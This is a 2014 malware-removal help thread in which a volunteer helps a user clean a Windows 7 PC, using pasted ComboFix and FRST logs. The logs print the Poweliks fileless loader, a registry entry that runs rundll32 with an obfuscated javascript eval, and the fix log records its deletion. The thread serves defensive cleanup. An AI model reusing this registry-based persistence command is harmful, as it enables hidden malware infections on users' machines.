
hostdll.exe help


12 replies to this topic

#1 morris79

morris79

  • Members
  • 6 posts

Posted 11 September 2014 - 08:53 AM

Have a computer that recently became infected. Scans are now clean, but I am sure it has a big-time hostdll.exe problem. Ran Farbar and here are the files. Can someone please help?



#2 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts

Posted 11 September 2014 - 09:34 AM

Hi there,

your computer is still infected. Please run Combofix:


Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#3 morris79

morris79
  • Topic Starter

  • Members
  • 6 posts

Posted 11 September 2014 - 10:04 AM

Running Combofix now. I will paste the contents when it completes.



#4 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts

Posted 11 September 2014 - 10:19 AM

Ok.

#5 morris79

morris79
  • Topic Starter

  • Members
  • 6 posts

Posted 11 September 2014 - 11:40 AM

Here it is. Thanks for the help!!!!
 
 
ComboFix 14-09-11.01 - Paul 09/11/2014  10:09:17.1.2 - x86
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3548.213 [GMT -5:00]
Running from: c:\users\Paul\Desktop\ComboFix.exe
AV: McAfee Anti-Virus and Anti-Spyware *Enabled/Updated* {ADA629C7-7F48-5689-624A-3B76997E0892}
FW: McAfee Firewall *Enabled* {959DA8E2-3527-57D1-4915-924367AD4FE9}
SP: McAfee Anti-Virus and Anti-Spyware *Enabled/Updated* {16C7C823-5972-5907-58FA-0004E2F9422F}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Paul\g2ax_customer_downloadhelper_win32_x86.exe
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         [encoded script blob omitted]
XZjuIHpU32n?0E?q*y8 DVFZ"hJ/"hSG)/tZhSFPYO5ysT5+4F0PY^nM^!vb*#JIn{l I!UvwQrPb+6,^U\=lE~Z~qbp8mmOm4`+*`N8pm^Wd+cbpvkkpAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-08-11 to 2014-09-11  )))))))))))))))))))))))))))))))
.
.
2014-09-11 16:09 . 2014-09-11 16:10 -------- d-----w- c:\users\Paul\AppData\Local\temp
2014-09-11 16:09 . 2014-09-11 16:09 -------- d-----w- c:\users\Paul Silliman\AppData\Local\temp
2014-09-11 16:09 . 2014-09-11 16:09 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-09-10 19:20 . 2014-09-10 19:39 -------- d-----w- C:\FRST
2014-09-10 18:35 . 2014-06-27 01:45 2285056 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-09-10 17:16 . 2014-06-24 02:59 1987584 ----a-w- c:\windows\system32\d3d10warp.dll
2014-09-10 17:13 . 2014-07-07 01:40 550912 ----a-w- c:\windows\system32\kerberos.dll
2014-09-10 17:13 . 2014-07-07 01:40 1059840 ----a-w- c:\windows\system32\lsasrv.dll
2014-09-10 17:07 . 2014-08-01 11:35 793600 ----a-w- c:\windows\system32\TSWorkspace.dll
2014-09-10 16:55 . 2014-09-05 01:52 445952 ----a-w- c:\windows\system32\aepdu.dll
2014-09-10 16:55 . 2014-09-05 01:47 302592 ----a-w- c:\windows\system32\aeinv.dll
2014-09-10 14:05 . 2014-09-10 14:05 -------- d-----w- c:\program files\CCleaner
2014-09-09 19:57 . 2014-09-09 20:01 -------- d-----w- C:\SERT
2014-09-06 13:16 . 2014-09-10 15:13 110296 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2014-09-06 13:14 . 2014-09-06 13:14 -------- d-----w- C:\found.000
2014-09-06 12:29 . 2014-05-12 12:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-09-06 12:29 . 2014-05-12 12:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-09-06 12:29 . 2014-09-06 12:29 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-09-06 11:50 . 2014-09-06 11:50 65 ---ha-w- c:\windows\system32\38891.bat
2014-08-29 15:21 . 2014-03-09 21:47 99480 ----a-w- c:\windows\system32\infocardapi.dll
2014-08-29 15:21 . 2014-06-30 22:14 8856 ----a-w- c:\windows\system32\icardres.dll
2014-08-29 15:21 . 2014-03-09 21:47 619672 ----a-w- c:\windows\system32\icardagt.exe
2014-08-29 15:21 . 2014-06-06 06:16 35480 ----a-w- c:\windows\system32\TsWpfWrp.exe
2014-08-29 15:18 . 2014-07-14 01:42 654336 ----a-w- c:\windows\system32\rpcrt4.dll
2014-08-29 15:18 . 2014-08-23 01:46 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-08-29 15:18 . 2014-08-23 00:42 2352640 ----a-w- c:\windows\system32\win32k.sys
2014-08-29 15:18 . 2014-06-03 09:29 2363392 ----a-w- c:\windows\system32\msi.dll
2014-08-29 15:18 . 2014-06-03 09:29 1805824 ----a-w- c:\windows\system32\authui.dll
2014-08-29 15:18 . 2014-06-03 09:30 101824 ----a-w- c:\windows\system32\consent.exe
2014-08-29 15:18 . 2014-06-03 09:29 337408 ----a-w- c:\windows\system32\msihnd.dll
2014-08-29 15:18 . 2014-07-16 02:46 2048 ----a-w- c:\windows\system32\tzres.dll
2014-08-29 15:18 . 2014-06-16 01:44 730048 ----a-w- c:\windows\system32\drivers\dxgkrnl.sys
2014-08-29 15:18 . 2014-06-16 01:44 219072 ----a-w- c:\windows\system32\drivers\dxgmms1.sys
2014-08-29 15:18 . 2014-06-16 01:40 107520 ----a-w- c:\windows\system32\cdd.dll
2014-08-23 11:25 . 2014-05-14 16:23 45536 ----a-w- c:\windows\system32\wups2.dll
2014-08-23 11:25 . 2014-05-14 16:23 54240 ----a-w- c:\windows\system32\wuauclt.exe
2014-08-23 11:24 . 2014-05-14 16:23 1973728 ----a-w- c:\windows\system32\wuaueng.dll
2014-08-23 11:24 . 2014-05-14 16:17 2425856 ----a-w- c:\windows\system32\wucltux.dll
2014-08-23 11:24 . 2014-05-14 16:23 36320 ----a-w- c:\windows\system32\wups.dll
2014-08-23 11:24 . 2014-05-14 16:23 581600 ----a-w- c:\windows\system32\wuapi.dll
2014-08-23 11:24 . 2014-05-14 16:17 92672 ----a-w- c:\windows\system32\wudriver.dll
2014-08-23 11:24 . 2014-05-14 14:23 179656 ----a-w- c:\windows\system32\wuwebv.dll
2014-08-23 11:24 . 2014-05-14 14:17 33792 ----a-w- c:\windows\system32\wuapp.exe
2014-08-22 14:32 . 2014-08-22 14:32 -------- d-----w- c:\programdata\{15443AB6-DA1B-46B5-A9BB-1311ED40AB1A}
2014-08-22 14:30 . 2013-09-23 18:48 147912 ----a-w- c:\windows\system32\drivers\HipShieldK.sys
2014-08-19 12:46 . 2014-08-19 12:46 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-19 12:46 . 2014-08-19 12:46 -------- d-----w- c:\program files\iPod
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-10 13:55 . 2012-04-13 10:42 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-09-10 13:55 . 2011-09-19 16:22 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-08-28 10:29 . 2010-06-24 16:33 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-12 13:10 . 2011-09-19 16:28 51712 ----a-w- c:\windows\system32\wltrynt.dll
2014-08-12 13:10 . 2011-09-19 16:28 457 ----a-w- c:\windows\system32\vcredist_x86.bat
2014-08-12 13:10 . 2011-09-19 16:28 2682880 ----a-w- c:\windows\system32\vcredist_x86.exe
2014-08-12 13:10 . 2011-09-19 16:28 50704 ----a-w- c:\windows\system32\drivers\npf.sys
2014-08-12 13:10 . 2011-09-19 16:28 6656 ----a-w- c:\windows\system32\bcmwlrc.dll
2014-08-12 13:10 . 2011-09-19 16:28 7348224 ----a-w- c:\windows\system32\BCMWLCPL.CPL
2014-08-12 13:10 . 2011-09-19 16:28 57344 ----a-w- c:\windows\system32\bcmwlrmt.dll
2014-08-12 13:10 . 2011-09-19 16:28 1022976 ----a-w- c:\windows\system32\BCMLogon.dll
2014-08-12 13:10 . 2011-09-19 16:28 4513792 ----a-w- c:\windows\system32\bcmttls.dll
2014-08-12 13:10 . 2011-09-19 16:28 18424 ----a-w- c:\windows\system32\drivers\bcm42rly.sys
2014-07-25 07:35 . 2014-07-25 07:35 875688 ----a-w- c:\windows\system32\msvcr120_clr0400.dll
2014-06-18 01:51 . 2014-07-11 10:46 646144 ----a-w- c:\windows\system32\osk.exe
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2014-06-27 19:27 1020624 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2014-06-27 19:27 1020624 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2014-06-27 19:27 1020624 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EnabledUnlockedFDEIconOverlay]
@="{30D3C2AF-9709-4D05-9CF4-13335F3C1E4A}"
[HKEY_CLASSES_ROOT\CLSID\{30D3C2AF-9709-4D05-9CF4-13335F3C1E4A}]
2011-12-08 15:38 121208 ----a-w- c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\MOBK]
@="{3c3f3c1a-9153-7c05-f938-622e7003894d}"
[HKEY_CLASSES_ROOT\CLSID\{3c3f3c1a-9153-7c05-f938-622e7003894d}]
2010-04-14 01:11 2872120 ----a-w- c:\program files\McAfee Online Backup\MOBKshell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\MOBK2]
@="{e6ea1d7d-144e-b977-98c4-84c53c1a69d0}"
[HKEY_CLASSES_ROOT\CLSID\{e6ea1d7d-144e-b977-98c4-84c53c1a69d0}]
2010-04-14 01:11 2872120 ----a-w- c:\program files\McAfee Online Backup\MOBKshell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\MOBK3]
@="{b4caf489-1eec-c617-49ad-8d7088598c06}"
[HKEY_CLASSES_ROOT\CLSID\{b4caf489-1eec-c617-49ad-8d7088598c06}]
2010-04-14 01:11 2872120 ----a-w- c:\program files\McAfee Online Backup\MOBKshell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\UninitializedFdeIconOverlay]
@="{CF08DA3E-C97D-4891-A66B-E39B28DD270F}"
[HKEY_CLASSES_ROOT\CLSID\{CF08DA3E-C97D-4891-A66B-E39B28DD270F}]
2011-12-08 15:38 121208 ----a-w- c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-01-31 137752]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-01-31 171032]
"Persistence"="c:\windows\system32\igfxpers.exe" [2011-01-31 172568]
"IAStorIcon"="c:\program files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe" [2010-11-06 283160]
"Broadcom Wireless Manager UI"="c:\program files\Dell\DW WLAN Card\WLTRAY.exe" [2014-08-12 4685824]
"RemoteControl9"="c:\program files\CyberLink\PowerDVD9\PDVD9Serv.exe" [2009-07-06 87336]
"PDVD9LanguageShortcut"="c:\program files\CyberLink\PowerDVD9\Language\Language.exe" [2010-04-29 50472]
"mcui_exe"="c:\program files\McAfee.com\Agent\mcagent.exe" [2014-07-09 514832]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-18 254696]
"mcpltui_exe"="c:\program files\Common Files\McAfee\Platform\mcuicnt.exe" [2014-07-07 496768]
"BrMfcWnd"="c:\program files\Brother\Brmfcmon\BrMfcWnd.exe" [2009-02-10 745472]
"ControlCenter3"="c:\program files\Brother\ControlCenter3\brctrcen.exe" [2007-10-30 77824]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]
"SoundMAXPnP"="c:\program files\Analog Devices\Core\smax4pnp.exe" [2011-02-24 1314816]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]
"Carbonite Backup"="c:\program files\Carbonite\Carbonite Backup\CarboniteUI.exe" [2014-06-27 1056976]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 0 (0x0)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"EnableVirtualization"= 0 (0x0)
"DisableCAD"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\spba]
2010-09-15 16:11 1971536 ----a-w- c:\program files\Common Files\SPBA\homefus2.dll
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Authentication Packages REG_MULTI_SZ   msv1_0 wvauth
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc]
@=""
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
backup=c:\windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Seagull Drivers]
ssdal_nc.exe startup [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2013-11-21 16:57 959904 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ApnUpdater]
2012-01-03 22:31 1391272 ----a-w- c:\program files\Ask.com\Updater\Updater.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Google Update]
2011-09-28 11:50 136176 ----atw- c:\users\Paul\AppData\Local\Google\Update\GoogleUpdate.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TdmNotify]
2011-12-08 15:37 323952 ----a-w- c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe
.
R3 BBSvc;Bing Bar Update Service;c:\program files\Microsoft\BingBar\BBSvc.EXE [2011-06-07 191752]
R3 BrSerIb;Brother MFC Serial Interface Driver(WDM);c:\windows\system32\DRIVERS\BrSerIb.sys [2009-07-14 265088]
R3 BrUsbSIb;Brother MFC Serial USB Driver(WDM);c:\windows\system32\DRIVERS\BrUsbSIb.sys [2009-07-13 11904]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2010-11-20 62464]
R3 HipShieldK;McAfee Inc. HipShieldK;c:\windows\system32\drivers\HipShieldK.sys [2013-09-23 147912]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-08-18 108032]
R3 mfefirek46;McAfee Inc.;Device\mfefirek46.sys [x]
R3 mfefirek50;McAfee Inc.;Device\mfefirek50.sys [x]
R3 mfencrk;McAfee Inc. mfencrk;c:\windows\system32\DRIVERS\mfencrk.sys [2014-03-18 81264]
R3 netvsc;netvsc;c:\windows\system32\DRIVERS\netvsc60.sys [2010-11-20 126464]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2012-08-23 14848]
R3 SynthVid;SynthVid;c:\windows\system32\DRIVERS\VMBusVideoM.sys [2010-11-20 19456]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2013-10-02 49152]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys [2010-11-20 27264]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2011-09-29 1343400]
R3 WvPCR;WvPCR;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [2012-01-16 145408]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe [2010-09-22 51040]
S0 mfewfpk;McAfee Inc. mfewfpk;c:\windows\system32\drivers\mfewfpk.sys [2014-05-02 215624]
S1 MOBKFilter;MOBKFilter;c:\windows\system32\DRIVERS\MOBK.sys [2010-04-14 54776]
S2 BBUpdate;BBUpdate;c:\program files\Microsoft\BingBar\SeaPort.EXE [2011-05-12 249648]
S2 EmbassyService;EmbassyService;c:\program files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [2012-01-17 179592]
S2 HomeNetSvc;McAfee Home Network;c:\program files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [2014-05-13 286672]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2010-11-06 13336]
S2 IntuitUpdateServiceV4;Intuit Update Service v4;c:\program files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe [2013-06-28 14624]
S2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\Common Files\Mcafee\McSvcHost\McSvHost.exe [2012-08-31 167784]
S2 McAPExe;McAfee AP Service;c:\program files\McAfee\MSC\McAPExe.exe [2014-07-09 527168]
S2 McMPFSvc;McAfee Personal Firewall Service;c:\program files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [2014-05-13 286672]
S2 McNaiAnn;McAfee VirusScan Announcer;c:\program files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [2014-05-13 286672]
S2 mcpltsvc;McAfee Platform Services;c:\program files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [2014-05-13 286672]
S2 mfecore;McAfee Anti-Malware Core;c:\program files\Common Files\McAfee\AMCore\mcshield.exe [2014-03-18 655936]
S2 mfefire;McAfee Firewall Core Service;c:\program files\Common Files\McAfee\SystemCore\\mfefire.exe [2014-05-02 169800]
S2 mfevtp;McAfee Validation Trust Protection Service;c:\windows\system32\mfevtps.exe [2014-05-02 179600]
S2 MOBKbackup;McAfee Online Backup;c:\program files\McAfee Online Backup\MOBKbackup.exe [2010-04-14 229688]
S3 cfwids;McAfee Inc. cfwids;c:\windows\system32\drivers\cfwids.sys [2014-05-02 61400]
S3 e1kexpress;Intel® PRO/1000 PCI Express Network Connection Driver K;c:\windows\system32\DRIVERS\e1k6232.sys [2009-11-06 214696]
S3 mfefirek;McAfee Inc. mfefirek;c:\windows\system32\drivers\mfefirek.sys [2014-05-02 367776]
S3 mfencbdc;McAfee Inc. mfencbdc;c:\windows\system32\DRIVERS\mfencbdc.sys [2014-03-18 345584]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - WS2IFSL
.
Contents of the 'Scheduled Tasks' folder
.
2014-09-11 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-13 13:55]
.
2014-09-11 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2011-10-01 12:29]
.
2014-09-11 c:\windows\Tasks\GoogleUpdateTaskMachineUA1cf8e2452dd23be.job
- c:\program files\Google\Update\GoogleUpdate.exe [2011-10-01 12:29]
.
2014-09-10 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-296848781-3995833910-2275520707-1001Core1cf4b42484e052c.job
- c:\users\Paul\AppData\Local\Google\Update\GoogleUpdate.exe [2011-09-28 11:50]
.
2014-09-11 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-296848781-3995833910-2275520707-1001UA1cf6ba7e2bf6cd8.job
- c:\users\Paul\AppData\Local\Google\Update\GoogleUpdate.exe [2011-09-28 11:50]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.yahoo.com/?ilc=17
uInternet Settings,ProxyOverride = *.local
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~3\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\MICROS~3\Office14\ONBttnIE.dll/105
TCP: DhcpNameServer = 192.168.169.12 192.168.169.17
TCP: Interfaces\{BAB2BA9C-F1CF-414A-A0DE-EA9AD3591E6F}: NameServer = 8.8.8.8,8.8.8.8
TCP: Interfaces\{BC0EE8A6-7D0A-4656-BE50-121CC3D7E979}: NameServer = 8.8.8.8,8.8.8.8
DPF: {8F2EACD9-51A6-4915-B9AD-2AA8657CB472} - hxxps://webpostage.stamps.com/webpostage/plugin/SdcWebClientServices.cab
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
Notify-GoToAssist Express Customer - c:\program files\Citrix\GoToAssist Remote Support Customer\594\g2ax_winlogon.dll
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-296848781-3995833910-2275520707-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-2770843)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_152_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_152_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'lsass.exe'(664)
c:\windows\system32\wvauth.DLL
.
Completion time: 2014-09-11  11:12:28
ComboFix-quarantined-files.txt  2014-09-11 16:12
.
Pre-Run: 408,154,935,296 bytes free
Post-Run: 415,009,812,480 bytes free
.
- - End Of File - - 7EF9A1C201C368B5A2D718DE642D4C72
5C616939100B85E558DA92B899A0FC36


#6 aharonov

Posted 11 September 2014 - 11:55 AM

Step 1

Please download this attached fixlist.txt and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Start FRST with administrator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#7 morris79

Posted 11 September 2014 - 12:48 PM

Here is the fixlog.txt

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 10-09-2014
Ran by Paul at 2014-09-11 12:02:11 Run:1
Running from E:\
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
CloseProcesses:
HKU\S-1-5-21-296848781-3995833910-2275520707-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
EmptyTemp:
*****************
 
Processes closed successfully.
"HKU\S-1-5-21-296848781-3995833910-2275520707-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-296848781-3995833910-2275520707-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
EmptyTemp: => Removed 183.5 MB temporary data.
 
 
The system needed a reboot. 
 
==== End of Fixlog ====

Here is the FRST.txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 10-09-2014
Ran by Paul (administrator) on PAUL-DELL2 on 11-09-2014 12:36:59
Running from E:\
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
() C:\Program Files\Dell\DW WLAN Card\WLTRYSVC.EXE
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(UPEK Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe
(Dell Inc.) C:\Program Files\Dell\DW WLAN Card\BCMWLTRY.EXE
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Microsoft\BingBar\SeaPort.EXE
